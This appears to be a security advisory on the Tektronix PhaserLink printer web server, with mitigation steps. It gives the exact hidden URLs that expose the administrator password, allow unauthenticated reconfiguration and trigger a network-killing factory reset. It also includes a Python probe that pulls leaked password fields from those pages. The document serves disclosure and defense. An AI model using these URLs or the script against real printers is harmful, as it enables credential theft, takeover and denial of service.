COMMAND

    Tektronix PhaserLink

SYSTEMS AFFECTED

    Tektronix PhaserLink Webserver

PROBLEM

    Dennis W. Mattison found  the following.  As  more and more printer
    companies add insecure protocols  and daemons to their printers  as
    "features" to make the machines  more available to end users,  they
    also  make  the  printers  more  available  to attackers.  Many  of
    the bugs  in these  printers are  easy to  exploit, since  the
    services usually ship turned  on by default and  little information
    is provided up front on how to turn them off.

    Tektronix has a particularly nasty bug which is quite amusing.   On
    the Phaser 740 color printer  (other models may be affected,  but
    the tester only had  access to this one)  Tektronix ships a  web
    server, built into  the printer, so  that an administrator can
    read and change the configuration remotely.  Pointing a standard
    web browser at the printer's URL lets any user see the Status  and
    Configuration pages.   Tektronix was  smart enough  to require  an
    administrator password  before the  settings can  be changed  (a
    good idea,  but as  we will  soon see  this password is a  joke).
    Tektronix  recommends  that  users  set  an administrator password,
    and the manual is quite specific  about how this is done (it  also
    states that the password is  sent unencrypted from the browser  to
    the  printer).   Unfortunately,  via  some  hidden and undocumented
    URLs  the  administrator  password  is  shown  to anyone without any
    authentication  at  all,  and  the  same  pages  let anyone  bypass
    the  password  and  reconfigure  the  printer  directly,  which
    defeats the purpose entirely.

    To grab the administrator password, just use the URL

        http://printername/ncl_items.html?SUBJECT=2097.

    Presto, the password  appears in plain  text for all  the world to
    see.  Of  course, you can  also change the  administrator password
    on this page  to whatever you  want, without providing  any
    authentication.  In fact, you can  change just about any piece  of
    configuration in the printer without a user id or password  by
    using the URL

        http://printername/ncl_subjects.html

    and choose one of the  subjects listed.  So, if  the administrator
    went  through  all  the  trouble  of  shutting  down  the insecure
    services  like  telnet  and  ftp  or  put  in  passwords for these
    services,  there  is  nothing  stopping  you  from  going  in  and
    changing these passwords and turning these services back on.   All
    you need to do is  swipe the administrator password, now  you have
    access to all the configuration options on the printer and can  do
    what you please.

    You may even like the fact that you can use the URL

        http://printername/ncl_items.html?SUBJECT=1

    and set  the factory  default setting  to On,  then hit  the "Lets
    change EVERYTHING" button  and voila, a  brand new printer  (and a
    really good  Network DoS,  since it  kills off  the IP address and
    other important networking information).

    Exploiting this (for just  about anything) is trivial.   The same
    behaviour was confirmed on the Phaser 780, 840 and 360.
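
    The following script is an  added example, not code from  the advisory
    or from Tektronix.  It performs  an unauthenticated GET against  the
    three hidden pages  named above and  reports whether the  printer hands
    back a configuration form  and a filled-in password  field.  The page
    names and the SUBJECT values come from the advisory; the host name
    "printername", the field name "AdminPassword" and the HTML layout of
    the sample page are assumptions, since the advisory does not
    reproduce what the pages actually look like.

```python
"""Unauthenticated probe for the hidden PhaserLink configuration pages.

Added example; not part of the advisory and not Tektronix code.  The page
names are from the advisory, everything about the HTML layout is assumed.
"""
import re
import urllib.error
import urllib.request

# Hidden configuration pages named in the advisory, relative to the printer root.
HIDDEN_PAGES = (
    "ncl_subjects.html",            # index of every configurable "subject"
    "ncl_items.html?SUBJECT=2097",  # administrator password / HTTP settings
    "ncl_items.html?SUBJECT=1",     # factory default switch
)

INPUT_TAG = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def fetch(url, timeout=5):
    """GET a URL with no credentials.  Returns (status, body); status is None
    when no connection could be made, and the body is empty on an HTTP error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def input_fields(body):
    """Return {name: value} for every named <input> tag in the page body."""
    fields = {}
    for tag in INPUT_TAG.findall(body):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        if "name" in attrs:
            fields[attrs["name"]] = attrs.get("value", "")
    return fields


def leaked_passwords(fields):
    """Fields whose name looks like a password and that carry a non-empty
    value, i.e. the server filled the secret into the form for us."""
    return {n: v for n, v in fields.items() if "passw" in n.lower() and v}


def classify(status, body):
    """Verdict for one unauthenticated request:
    'exposed'       200 and the page hands back a configuration form
    'auth-required' the server challenged for credentials
    'closed'        anything else (404, HTTP disabled, ...)
    'unreachable'   no connection (port 80 filtered or web server off)"""
    if status is None:
        return "unreachable"
    if status == 401:
        return "auth-required"
    if status == 200 and input_fields(body):
        return "exposed"
    return "closed"


def scan(host):
    """Probe every hidden page on `host`; returns {page: (verdict, leaked)}."""
    results = {}
    for page in HIDDEN_PAGES:
        status, body = fetch("http://%s/%s" % (host, page))
        results[page] = (classify(status, body),
                         leaked_passwords(input_fields(body)))
    return results


# Constructed sample of what an exposed ncl_items page might return.  The
# field names are invented for this example; a real PhaserLink page differs.
SAMPLE_EXPOSED_BODY = """<html><body><form method="GET" action="ncl_items.html">
<input type="hidden" name="SUBJECT" value="2097">
<input type="text" name="AdminPassword" value="s3cret">
<input type="radio" name="HTTP" value="On" checked>
<input type="submit" value="Submit"></form></body></html>"""

if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "printername"  # assumed host
    for page, (verdict, leaked) in scan(host).items():
        print("%-28s %-14s %s" % (page, verdict, leaked or ""))
```

    Run it as "python3 probe.py printername".  A verdict of "exposed"  on
    SUBJECT=2097 together with a  non-empty leaked field is  the condition
    described above; "unreachable" after applying the fixes below is  what
    you want to see.  The password heuristic only matches field names,  so
    on a real printer inspect the returned form by hand as well.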

SOLUTION

    1.  Block port 80 access to this printer via a router or firewall.
        This  will  prevent  access  to  the  web  server  from outside
        the  network.   Also,  since  very  rarely  will  anyone  print
        from outside  the local  network, setting  the printer's default
        gateway to its  own IP address  will keep outside  users from
        reaching this service.   Note that neither  measure stops anyone
        who is already on the local network, since the pages themselves
        still require no authentication.

    2.  Disable the PhaserLink web server on the printer.  This can  be
        done  from  the  control  panel  by  switching  the   HTTP
        Protocol to  Disabled (under  Printer Configuration  | Network
        Settings | HTTP), but it can also be done via the URL
        http://printername/ncl_items?SUBJECT=2097,  by  switching  the
        setting from "On" to "Off".  (We are still testing the  printer
        to make sure that this setting permanently disables the  HTTP
        server.)  Doing so will of course prevent you from administering
        this machine remotely with a web browser.

    There are  other methods,  but these  two appear  to be  the best.
    According to Bernhard Schneck  and Gerhard den Hollander,  the 350
    and 560  printers are  not vulnerable  to this  attack (confirmed
    on one of our printers here).  The Phaser 260 also seems to be
    clean.